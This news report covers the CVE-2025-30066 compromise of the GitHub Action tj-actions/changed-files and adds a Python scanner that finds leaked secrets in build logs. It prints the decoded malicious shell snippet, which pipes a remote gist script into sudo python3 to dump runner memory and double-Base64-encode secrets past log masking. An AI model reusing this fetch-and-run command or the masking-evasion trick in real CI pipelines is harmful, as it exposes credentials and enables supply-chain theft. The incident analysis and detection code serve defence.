
Attack on GitHub Actions tool siphons off secrets and writes them into the build log



StepSecurity, a company specializing in security for CI/CD pipelines (continuous integration/continuous delivery), has discovered an attack on the open-source GitHub Actions tool tj-actions/changed-files. An unknown attacker smuggled code into the tool that writes sensitive information, such as AWS keys, GitHub Personal Access Tokens (PATs) and private RSA keys, from the project's build into the log file.

The CVE entry (Common Vulnerabilities and Exposures) CVE-2025-30066 rates the issue with a score of 8.6, classified as high. StepSecurity discovered the attack on March 14. The maintainers of tj-actions/changed-files have since removed the malicious code from the project. However, there is still a risk that build logs containing sensitive information remain viewable in public GitHub repositories.

tj-actions/changed-files can be integrated into GitHub Actions workflows. The tool tracks which files have changed during the CI/CD process.

The attackers apparently gained access to the repository via a personal access token belonging to the @tj-actions-bot account. According to the issue in the repository, it is not yet understood how the PAT was compromised. GitHub has since revoked the tokens. The project maintainers have changed passwords and enabled passkey authentication as protection against future attacks.


For the attack, a Base64-encoded code section first landed in the repository. Decoded, it is a shell snippet that downloads a Python script from a GitHub gist and runs it:

if [[ "$OSTYPE" == "linux-gnu" ]]; then
  # Fetch memdump.py from the gist and run it as root; from its output keep only
  # the JSON fragments of the form "NAME":{"value":"...","isSecret":true},
  # deduplicate them and Base64-encode the result twice before printing it.
  B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0`
  echo $B64_BLOB
else
  exit 0
fi

The Python script memdump.py dumps the memory of the runner process, where the secrets are held in clear text; the shell wrapper filters out the secret fragments and writes them to the log. So that the runner's security mechanisms do not automatically recognise the values as secrets and mask them, the output is encoded twice with Base64 (the two base64 -w 0 calls above).

Even though the maintainers have removed the malicious code from the project and the gist with the malicious code is no longer available, public repositories remain at risk: attackers can read the build logs and decode the sensitive information.

Anyone who uses the tool in a GitHub Actions pipeline should check the build logs for suspicious content. If a log contains double Base64-encoded sections, it is not enough to delete the logs; the affected secrets must also be rotated.
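As an added example (not code from this article, from StepSecurity or from the tj-actions project), the following Python scans build-log text for the pattern the malicious wrapper emitted: a long run of Base64 characters that decodes, twice, to fragments of the form "NAME":{"value":"...","isSecret":true}. It reports the secret names and line numbers without re-printing the values. The sample log is constructed here, and the 64-character minimum run length and the secret names are assumptions; the scanner also checks a single Base64 layer, which goes slightly beyond the double-encoded case the article describes.

```python
import base64
import binascii
import re

# A leaked blob is one uninterrupted run of Base64 characters on a log line.
# Assumption: 64 characters is long enough to skip ordinary tokens; tune it.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")

# The same shape the attacker's grep pulled out of the runner's memory dump.
SECRET_FRAGMENT = re.compile(r'"([^"]+)":\{"value":"([^"]*)","isSecret":true\}')


def peel_base64(blob: str, layers: int = 2) -> list:
    """Decode up to `layers` nested Base64 encodings and return every layer
    that decodes to text. The attack used two layers; checking one as well
    costs nothing and catches a sloppier variant."""
    texts = []
    data = blob.encode("ascii")
    for _ in range(layers):
        try:
            data = base64.b64decode(data, validate=True)
            texts.append(data.decode("utf-8"))
        except (binascii.Error, ValueError, UnicodeDecodeError):
            break
    return texts


def find_leaked_secrets(log_text: str) -> list:
    """Return one finding per secret fragment found in the log: the log line
    number, the secret's name and the length of its value. The value itself is
    deliberately not returned, so the scanner does not leak it a second time."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for blob in B64_RUN.findall(line):
            for text in peel_base64(blob):
                for name, value in SECRET_FRAGMENT.findall(text):
                    findings.append(
                        {"line": lineno, "name": name, "value_length": len(value)}
                    )
    return findings


def build_sample_log() -> str:
    """Constructed sample, not a real capture: two harmless lines, a hex digest
    that looks like Base64 but is not a leak, and one line in exactly the form
    the malicious wrapper printed (secret names and values are made up)."""
    fragments = "\n".join([
        '"AWS_SECRET_ACCESS_KEY":{"value":"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY","isSecret":true}',
        '"GH_PAT":{"value":"ghp_0000000000000000000000000000000000AB","isSecret":true}',
    ])
    double_encoded = base64.b64encode(base64.b64encode(fragments.encode())).decode()
    return "\n".join([
        "Run tj-actions/changed-files@v45",
        "sha256:" + "ab" * 32,
        double_encoded,
        "All files processed",
    ])


if __name__ == "__main__":
    for hit in find_leaked_secrets(build_sample_log()):
        print(f"line {hit['line']}: secret {hit['name']} leaked "
              f"({hit['value_length']} chars) - rotate it")
```

Run it against a downloaded workflow log (for example the raw log archive from the Actions tab) rather than against the rendered web view, since the web view may already have masked or truncated long lines. Every secret name the scanner reports is one to rotate, regardless of whether the repository is public.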


(RME)
